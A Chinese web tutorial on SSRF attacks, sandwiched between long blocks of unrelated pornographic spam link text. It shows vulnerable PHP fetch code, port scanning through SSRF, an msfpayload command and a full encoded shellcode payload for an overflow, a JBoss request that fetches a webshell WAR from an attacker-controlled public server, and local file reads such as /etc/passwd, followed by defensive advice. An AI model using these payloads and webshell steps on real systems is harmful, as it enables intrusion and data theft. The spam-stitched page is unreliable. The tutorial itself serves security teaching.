精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

SSRF攻擊實例解析

安全 應用安全
很多web應用都提供了從其他的服務器上獲取數據的功能。使用用戶指定的URL,web應用可以獲取圖片,下載文件,讀取文件內容等。這個功能如果被惡意使用,可以利用存在缺陷的web應用作為代理攻擊遠程和本地的服務器。這種形式的攻擊稱為服務端請求偽造攻擊(Server-side Request Forgery)。

ssrf攻擊概述

很多web應用都提供了從其他的服務器上獲取數據的功能。使用用戶指定的URL,web應用可以獲取圖片,下載文件,讀取文件內容等。這個功能如果被惡意使用,可以利用存在缺陷的web應用作為代理攻擊遠程和本地的服務器。這種形式的攻擊稱為服務端請求偽造攻擊(Server-side Request Forgery)。

比如下圖顯示的就是提供這種功能的典型應用:

SSRF攻擊實例解析

如果應用程序對用戶提供的URL和遠端服務器返回的信息沒有進行合適的驗證和過濾,就可能存在這種服務端請求偽造的缺陷。Google,Facebook,Adobe,baidu,tencent等知名公司都被發現過這種漏洞。攻擊者利用ssrf可以實現的攻擊主要有5種:

1.可以對外網、服務器所在內網、本地進行端口掃描,獲取一些服務的banner信息;

2.攻擊運行在內網或本地的應用程序(比如溢出);

3.對內網web應用進行指紋識別,通過訪問默認文件實現;

4.攻擊內外網的web應用,主要是使用get參數就可以實現的攻擊(比如struts2,sqli等);

5.利用file協議讀取本地文件等。

常用的后端實現

ssrf攻擊可能存在任何語言編寫的應用,我們通過一些php實現的代碼來作為樣例分析。代碼的大部分來自于真實的應用源碼。

1,php file_get_contents:

  1. <?php 
  2. if (isset($_POST['url']))  
  3. {  
  4. $content = file_get_contents($_POST['url']);  
  5. $filename ='./images/'.rand().';img1.jpg';  
  6. file_put_contents($filename$content);  
  7. echo $_POST['url'];  
  8. $img = "<img src=\"".$filename."\"/>";  
  9. }  
  10. echo $img;  
  11. ?> 

這段代碼使用file_get_contents函數從用戶指定的url獲取圖片。然后把它用一個隨即文件名保存在硬盤上,并展示給用戶。

2,php fsockopen():

  1. <?php  
  2. function GetFile($host,$port,$link)  
  3. {  
  4. $fp = fsockopen($hostintval($port), $errno$errstr, 30);  
  5. if (!$fp) {  
  6. echo "$errstr (error number $errno) \n";  
  7. else {  
  8. $out = "GET $link HTTP/1.1\r\n";  
  9. $out .= "Host: $host\r\n";  
  10. $out .= "Connection: Close\r\n\r\n";  
  11. $out .= "\r\n";  
  12. fwrite($fp$out);  
  13. $contents='';  
  14. while (!feof($fp)) {  
  15. $contents.= fgets($fp, 1024);  
  16. }  
  17. fclose($fp);  
  18. return $contents;  
  19. }  
  20. ?> 

這段代碼使用fsockopen函數實現獲取用戶制定url的數據(文件或者html)。這個函數會使用socket跟服務器建立tcp連接,傳輸原始數據。

3,php curl_exec():

  1. <?php  
  2. if (isset($_POST['url'])) 
  3. $link = $_POST['url']; 
  4. $curlobj = curl_init(); 
  5. curl_setopt($curlobj, CURLOPT_POST, 0); 
  6. curl_setopt($curlobj,CURLOPT_URL,$link); 
  7. curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); 
  8. $result=curl_exec($curlobj); 
  9. curl_close($curlobj); 
  10.  
  11. $filename = './curled/'.rand().'.txt'
  12. file_put_contents($filename$result);  
  13. echo $result
  14. ?> 

這是另外一個很常見的實現。使用curl獲取數據。

攻擊場景

大部分的web服務器架構中,web服務器自身都可以訪問互聯網和服務器所在的內網。下圖展示了web服務器的請求可以到達的地方。

SSRF攻擊實例解析#p#

端口掃描

大多數社交網站都提供了通過用戶指定的url上傳圖片的功能。如果用戶輸入的url是無效的。大部分的web應用都會返回錯誤信息。攻擊者可以輸入一些不常見的但是有效的URI,比如

http://example.com:8080/dir/images/
http://example.com:22/dir/public/image.jpg
http://example.com:3306/dir/images/

然后根據服務器的返回信息來判斷端口是否開放。大部分應用并不會去判斷端口,只要是有效的URL,就發出了請求。而大部分的TCP服務,在建立socket連接的時候就會發送banner信息,banner信息是ascii編碼的,能夠作為原始的html數據展示。當然,服務端在處理返回信息的時候一般不會直接展示,但是不同的錯誤碼,返回信息的長度以及返回時間都可以作為依據來判斷遠程服務器的端口狀態。

下面一個實現就可以用來做端口掃描:

  1. <?php  
  2. if (isset($_POST['url'])) 
  3. $link = $_POST['url']; 
  4. $filename = './curled/'.rand().'txt'
  5. $curlobj = curl_init($link); 
  6. $fp = fopen($filename,"w"); 
  7. curl_setopt($curlobj, CURLOPT_FILE, $fp); 
  8. curl_setopt($curlobj, CURLOPT_HEADER, 0); 
  9. curl_exec($curlobj); 
  10. curl_close($curlobj); 
  11. fclose($fp); 
  12. $fp = fopen($filename,"r"); 
  13. $result = fread($fpfilesize($filename));  
  14. fclose($fp); 
  15. echo $result
  16. ?> 

讀者可以使用如下表單提交測試(比較簡陋~~):

  1. <html><body> 
  2. <form name="px" method="post" action="http://127.0.0.1/ss.php"> 
  3. <input type="text" name="url" value=""> 
  4. <input type="submit" name="commit" value="submit"> 
  5. </form> 
  6. <script> 
  7. </script> 
  8. </body></html> 

正常情況下,請求http://www.twitter.com/robots.txt 返回結果如下:

SSRF攻擊實例解析

如果請求非http服務的端口,比如:http://scanme.nmap.org:22/test.txt 會返回banner信息

SSRF攻擊實例解析

請求關閉的端口會報錯:http://scanme.nmap.org:25/test.txt

SSRF攻擊實例解析

請求本地的mysql端口:http://127.0.0.1:3306/test.txt

SSRF攻擊實例解析

當然大多數互聯網的應用并不會直接返回banner信息。不過可以通過前面說過的,處錯誤信息,響應時間,響應包大小來判斷。下面是Google的webmaster應用中,利用返回信息判斷端口狀態的案例.該缺陷Google已修復。

SSRF攻擊實例解析

SSRF攻擊實例解析

SSRF攻擊實例解析#p#

攻擊應用程序

內網的安全通常都很薄弱,溢出,弱口令等一般都是存在的。通過ssrf攻擊,可以實現對內網的訪問,從而可以攻擊內網或者本地機器,獲得shell等。

下面是用一個小程序本地來演示:

請求:http://127.0.0.1:8987/test.txt

SSRF攻擊實例解析

探測到8987端口開放。

請求:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

SSRF攻擊實例解析

SSRF攻擊實例解析

這里是白盒分析,實戰的時候當然沒這個條件只能是利用已知漏洞來溢出。通過分析寫好exp。因為http是基于文本的協議,所以處理一些不可以打印的unicode字符會存在問題。這里使用msfencode來進行編碼。命令如下:

msfpayload widnows/exec CMD=calc.exe R | msfencode

bufferRegister=ESP -e x86/alpha_mixed

最終payload如下:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

@'ßwTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlhhm
YUPWpWp3Pk9he01xRSTnkpRfPlKPRtLLKPR24NkbR7XDOMgszuvVQ9oeaKpllgL3QQl
5RFLWPiQJodM31JgKRHpaBPWNk3bvpLKsrWLwqZpLK1P0xMU9PSDCz7qZpf0NkQX6xn
k2xUps1n3xcgL3yNkednkVayF4qKO5aKpnLIQJo4M31O76XIpbUzTdC3MHxGKamvDbU
8bchLKShEtgqhSQvLKtLRkNkShuLgqZslK5TlKVaZpoy3tGTWTqKqKsQ0YSjRqyoKP2
xCoSjnkwb8kLFqM0jFaNmLElyc05PC0pPsX6QlK0oOwkOyEOKhph5920VBHY6MEoMOm
KON5Uls6SLUZMPykip2UfeoK3wfs422OBJs0Sc9oZuCSPaPl3SC0AA

溢出成功,彈出計算器。

SSRF攻擊實例解析

大家也許會對http發送的數據是否能被其他服務器協議接收存在疑問。可以參考跨協議通信技術利用.#p#

內網web應用指紋識別

識別內網應用使用的框架,平臺,模塊以及cms可以為后續的攻擊提供很多幫助。大多數web應用框架都有一些獨特的文件和目錄。通過這些文件可以識別出應用的類型,甚至詳細的版本。根據這些信息就可以針對性的搜集漏洞進行攻擊。比如可以通過訪問下列文件來判斷phpMyAdmin是否安裝:

Request: http://127.0.0.1:8080/phpMyAdmin/themes/original/img/b_tblimport.png
Request: http://127.0.0.1:8081/wp-content/themes/default/images/audio.jpg
Request: http://127.0.0.1:8082/profiles/minimal/translations/README.txt

訪問 http://10.0.0.1/portName.js 可以判斷是否是Dlink 路由器

SSRF攻擊實例解析

下面百度的案例來自于wooyun,已經修復。通過訪問http://10.50.33.43:8080/manager/images/tomcat.gif 識別出服務器使用了tomcat。

SSRF攻擊實例解析

SSRF攻擊實例解析#p#

攻擊內網web應用

僅僅通過get方法可以攻擊的web有很多,比如struts2命令執行等。這里提供一個Jboss的案例,使用一個get請求即可部署webshell。

SSRF攻擊實例解析

只需要將網馬放在公網服務器上,然后發送這個請求即可:

&name=jboss.system:service=MainDeployer&methodIndex=17
&arg0=http://our_public_internet_server/utils/cmd.war

通過加參數請求網馬執行命令:http://127.0.0.1:8080/cmd/shell.jsp?x=dir

SSRF攻擊實例解析

實戰中一般不會有回顯,類似于盲打只能。

讀取本地文件

上面提到的案例都是基于http請求的。如果我們指定file協議,也可能讀到服務器上的文件。如下的請求會讓應用讀取本地文件:

Request: file:///C:/Windows/win.ini

SSRF攻擊實例解析

下面是Adobe的一個案例,已經修復。請求為file:///etc/passwd

SSRF攻擊實例解析

如何防御

通常有以下5個思路:

1,過濾返回信息,驗證遠程服務器對請求的響應是比較容易的方法。如果web應用是去獲取某一種類型的文件。那么在把返回結果展示給用戶之前先驗證返回的信息是否符合標準。

2, 統一錯誤信息,避免用戶可以根據錯誤信息來判斷遠端服務器的端口狀態。

3,限制請求的端口為http常用的端口,比如,80,443,8080,8090。

4,黑名單內網ip。避免應用被用來獲取獲取內網數據,攻擊內網。

5,禁用不需要的協議。僅僅允許http和https請求。可以防止類似于file:///,gopher://,ftp:// 等引起的問題。

參考資料

http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html

http://evilcos.me/?p=2

http://www.wooyun.org

via riyazwalikar.com

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2022-02-16 07:37:36

惡意文檔網絡釣魚攻擊

2011-05-16 10:50:19

2018-11-02 12:37:53

DDos攻擊信息安全攻擊

2011-01-26 12:56:24

2010-10-09 11:20:13

2011-04-13 11:16:10

路由器WCCPWeb

2009-07-12 16:50:08

2025-03-14 06:30:00

漏洞網絡攻擊網絡安全

2013-04-03 10:34:52

2013-04-01 10:12:39

2014-12-31 09:10:57

2010-10-08 14:53:17

2023-02-23 09:32:13

2009-09-23 15:12:41

Hibernate視圖

2011-04-02 11:02:24

2010-08-02 09:43:00

Flex應用

2012-11-27 09:59:46

2011-06-13 14:56:10

2014-01-13 09:30:20

2009-09-09 14:40:15

C# XML解析
點贊
收藏

51CTO技術棧公眾號

日韩欧美一区二区三区四区| 中文字幕自拍vr一区二区三区| 亚洲爆乳无码精品aaa片蜜桃| 性生活三级视频| 99国产精品| 国产一区二区黄| 美女被艹视频网站| 九九色在线视频| 久久亚洲欧美国产精品乐播| 国产精品成人免费电影| 成人免费毛片东京热| 日韩激情网站| 91精品婷婷国产综合久久| 欧美日韩精品在线一区二区| 香港伦理在线| 国产精品系列在线观看| 日韩免费观看在线观看| 欧美日韩国产精品综合| 日本韩国欧美超级黄在线观看| 欧美日韩国产欧美日美国产精品| 欧美男女爱爱视频| 免费在线观看av| 91视视频在线观看入口直接观看www | 久久人人爽人人人人片| 亚洲高清国产拍精品26u| 都市激情亚洲色图| 黄色一级大片免费| h视频在线免费| eeuss国产一区二区三区| 成人在线观看视频网站| 亚洲线精品一区二区三区八戒| 日韩精品一区二区三区在线播放 | 你懂的国产精品| 欧美一区二区三区四区在线观看| 国产成人a亚洲精v品无码| 97caopor国产在线视频| 欧美国产乱子伦| 免费看污久久久| 欧美视频xxx| 国产一区二区免费视频| 国产精品久久一| 久久不卡免费视频| 国内视频精品| 欧美成人午夜影院| 国产三级精品三级观看| 久久最新网址| 亚洲精品国精品久久99热一| wwwww在线观看| 国产精品麻豆| 欧美欧美欧美欧美| 色噜噜狠狠一区二区| 91亚洲视频| 欧亚洲嫩模精品一区三区| 97av视频在线观看| 日韩欧美精品一区二区三区| 亚洲va欧美va天堂v国产综合| 大陆极品少妇内射aaaaaa| 黄色免费在线看| 亚洲欧洲综合另类在线| 最新视频 - x88av| 中文字幕中文字幕在线中高清免费版| 亚洲欧洲成人自拍| 男女啪啪的视频| 国产精品久久久久久福利| 国产精品妹子av| 中文字幕日韩精品一区二区| 好吊日视频在线观看| 成人免费在线视频| 成人手机在线播放| 欧美性受ⅹ╳╳╳黑人a性爽| 一区二区视频在线| 日韩欧美不卡在线| 在线观看特色大片免费视频| 色欧美日韩亚洲| 天天视频天天爽| 色999韩欧美国产综合俺来也| 欧美老女人第四色| 乳色吐息在线观看| 国产精品久久久久av蜜臀| 亚洲精品www久久久| 中文字幕第4页| 久久影视一区| 久久99热精品| 日韩在线视频免费播放| 日韩精品电影在线| 成人美女免费网站视频| 亚洲第一视频在线播放| 97se狠狠狠综合亚洲狠狠| 日本在线播放不卡| 国产精品久久久久久福利| 亚洲成人资源网| 国产综合免费视频| 成人国产精品久久| 亚洲第一区在线| 国产美女永久免费无遮挡| 国产精品久久久久久久久妇女| 久久91精品国产91久久久| 精品国产免费观看| 美女在线一区二区| 国产乱码精品一区二区三区不卡| 巨骚激情综合| 亚洲欧美日韩在线不卡| 免费在线a视频| 成人豆花视频| 亚洲欧美国内爽妇网| 久久国产高清视频| 亚洲自啪免费| 91久久在线播放| 日韩av免费观影| 亚洲日穴在线视频| wwwxxx黄色片| 国产精品zjzjzj在线观看| 一区二区福利视频| 国产成人亚洲欧洲在线| 久久草av在线| 欧美系列一区| 欧美人与牲禽动交com| 91黄色免费看| 久久人人爽人人人人片| 你懂的成人av| 国产一区二区香蕉| 加勒比一区二区三区在线| 亚洲国产视频a| 日本77777| 国产一卡不卡| 51午夜精品视频| 朝桐光av在线一区二区三区| 国产欧美精品在线观看| 97国产在线播放| 精品一区二区三区中文字幕在线| 亚洲午夜精品久久久久久久久久久久 | 一级做a爱片久久毛片| 久久综合色播五月| 日韩欧美不卡在线| avtt综合网| 九九久久综合网站| 国产情侣一区二区| 国产精品你懂的在线| 午夜视频在线瓜伦| 最新国产精品视频| 国产91精品不卡视频| 亚洲国产精彩视频| 亚洲激情图片小说视频| 日韩成人av免费| 久久神马影院| 国产欧美日韩中文| av午夜在线| 欧美在线观看你懂的| 欧美大波大乳巨大乳| 久久久久国内| 欧美精品尤物在线| 小视频免费在线观看| 亚洲精品美女久久久| 日韩欧美亚洲一区二区三区| 99视频精品在线| 777精品久无码人妻蜜桃| 久草精品视频| 57pao国产成人免费| 日韩欧美亚洲系列| 91成人在线精品| 国产精品成人无码免费| 美女www一区二区| 一个色的综合| 精品久久亚洲| 欧美福利视频网站| 人妻va精品va欧美va| 五月综合激情日本mⅴ| 亚洲色偷偷色噜噜狠狠99网| 99综合在线| 日本一区二区精品| 青青在线精品| 欧美成人四级hd版| 无套内谢的新婚少妇国语播放| 亚洲va天堂va国产va久| www.久久国产| 奇米777欧美一区二区| 吴梦梦av在线| 97品白浆高清久久久久久| 97视频在线观看网址| 邻居大乳一区二区三区| 欧美日韩成人综合天天影院| 国产97免费视频| 99精品国产99久久久久久白柏| 成人在线看视频| 日韩在线理论| 高清视频一区二区三区| 综合毛片免费视频| 日韩在线观看免费全| 六月婷婷综合网| 日本乱人伦一区| 东方av正在进入| 91麻豆免费看片| 亚洲欧美日韩精品一区| 亚洲一级高清| 亚洲欧洲日韩综合二区| 亚洲电影一区| 日韩免费在线免费观看| 国产二区三区在线| 国产视频久久久| 国产男女猛烈无遮挡| 欧美日韩亚洲一区二区| 欧美日韩午夜视频| 久久日韩粉嫩一区二区三区| 国内自拍第二页| 久久看片网站| 久久亚洲国产成人精品无码区| 国产精品手机在线播放| 97人人做人人人难人人做| 久久sese| 久久久这里只有精品视频| 91在线网址| 日韩av影院在线观看| 99精品在线视频观看| 色婷婷久久综合| 国产在线观看免费av| 中文一区二区在线观看| 国产精品成人无码专区| 韩日av一区二区| 国产xxxxx视频| 欧美精品三区| 亚洲永久激情精品| 亚洲精华一区二区三区| 成人久久18免费网站漫画| 992tv国产精品成人影院| 欧美一区二区色| 后进极品白嫩翘臀在线播放| 久久久国产精品视频| 成年在线观看免费人视频| 亚洲精品电影网| 性欧美videos另类hd| 欧美日韩成人在线一区| 中文在线资源天堂| 色噜噜狠狠色综合中国| 波多野结衣国产| 亚洲国产精品影院| 亚洲国产精品久| 亚洲色图在线播放| 日本女人性生活视频| 欧美激情一区二区三区全黄| 女人又爽又黄免费女仆| 91女人视频在线观看| 中文字幕一区二区三区乱码不卡| 国产激情视频一区二区在线观看| 午夜剧场高清版免费观看| 美女视频黄 久久| 超碰在线人人爱| 日韩国产欧美视频| www日韩在线观看| 视频一区二区三区在线| 久久久久人妻精品一区三寸| 国产日韩精品视频一区二区三区 | 免费日韩av| 亚洲中文字幕无码专区| 一区二区三区高清视频在线观看| 日韩精品在线中文字幕| 欧美日韩91| 成人免费性视频| 精品电影一区| 国产精品又粗又长| 国产精品资源| 国产日韩成人内射视频| 日本不卡视频在线观看| 性猛交ⅹ×××乱大交| 久久91精品久久久久久秒播| 天天摸天天舔天天操| 国产麻豆精品在线| 精品无码人妻少妇久久久久久| 成人h版在线观看| 亚洲男人在线天堂| 国产欧美日韩精品在线| а天堂中文在线资源| 亚洲精品高清在线| 日本一区二区网站| 一本色道**综合亚洲精品蜜桃冫| 最好看的日本字幕mv视频大全| 欧美美女直播网站| 亚洲国产www| 亚洲欧美精品一区二区| 在线播放毛片| 欧美激情精品久久久久久免费印度| heyzo高清国产精品| 日韩美女在线播放| 国产精品3区| 精品国产91亚洲一区二区三区www| 免费成人结看片| 免费看污污视频| 亚洲影音先锋| 国产福利精品一区二区三区| 粉嫩av一区二区三区| 97超碰在线资源| 亚洲欧美福利一区二区| 日本中文字幕网| 欧美色视频一区| 日韩在线视频第一页| 亚洲色无码播放| 污污片在线免费视频| 欧美在线日韩在线| 国产精品一区二区精品视频观看 | 天堂在线视频观看| 中文字幕日韩av综合精品| 黄网av在线| 国产精品一二三在线| 成人精品毛片| 一本一本a久久| 成人性教育av免费网址| 欧美激情一区二区三区高清视频| sm性调教片在线观看| 国产精品丝袜视频| 动漫视频在线一区| 亚洲一区精品视频| 99在线热播精品免费99热| 日韩av一卡二卡三卡| 91亚洲精品久久久蜜桃| 国产美女18xxxx免费视频| 成人精品免费网站| 岛国片在线免费观看| 午夜久久久影院| 国产青青草视频| 国产精品素人视频| 亚洲成人av免费观看| 久久久久国产精品麻豆| 2021亚洲天堂| 欧美无人高清视频在线观看| 亚洲国产中文字幕在线| 日日骚av一区| 日本高清不卡一区二区三区视频| 国产99午夜精品一区二区三区| 久久婷婷蜜乳一本欲蜜臀| 男女午夜激情视频| 素人一区二区三区| 精品网站在线看| 在线观看日韩av电影| www,av在线| 国产精品二三区| 中文字幕免费高清在线观看| 亚洲久久久久久久久久久| 高清视频在线观看三级| 国产高清在线一区| 国内精品久久久久久久影视麻豆| 亚洲精品mv在线观看| 中文字幕一区av| 中文字幕视频一区二区| 最近2019年日本中文免费字幕 | 欧美禁忌电影| 日本毛片在线免费观看| 成人免费视频app| 国产一级特黄毛片| 精品少妇一区二区三区免费观看| av在线播放国产| 91免费看蜜桃| 欧美日韩一区二区三区四区在线观看| 五月天六月丁香| 一区二区三区日韩欧美精品| 性中国古装videossex| 国内精品视频一区| 美女一区2区| 国产一区二区三区精彩视频| 91女厕偷拍女厕偷拍高清| 7799精品视频天天看| 亚洲天堂男人天堂女人天堂| av免费在线一区| 一区二区三区av| 国产乱淫av一区二区三区 | 色综合中文字幕国产| 男女视频在线观看免费| 国产精品观看在线亚洲人成网| 日韩综合精品| 熟妇无码乱子成人精品| 亚洲一区二区精品3399| 亚洲 欧美 激情 另类| 欧美一区深夜视频| 欧美影院三区| 911av视频| 亚洲第一久久影院| 欧美日韩国产亚洲沙发| 国产日韩精品在线观看| 午夜精品久久99蜜桃的功能介绍| 欧美日韩人妻精品一区在线| 色综合欧美在线视频区| 777电影在线观看| 成人av资源| 久久这里只有| 91精品国产闺蜜国产在线闺蜜| 亚洲精品wwwww| 国产日本久久| 亚洲永久无码7777kkk| 亚洲美女视频在线| 黄色小视频免费观看| 日本高清+成人网在线观看| 波多野结衣在线播放一区| 亚洲综合伊人久久| 精品成人av一区| 在线激情网站| 国产成人亚洲欧美| 日韩专区欧美专区| 精国产品一区二区三区a片| 国产丝袜一区视频在线观看| 二区三区精品| 亚洲中文字幕无码不卡电影| 自拍视频在线观看一区二区|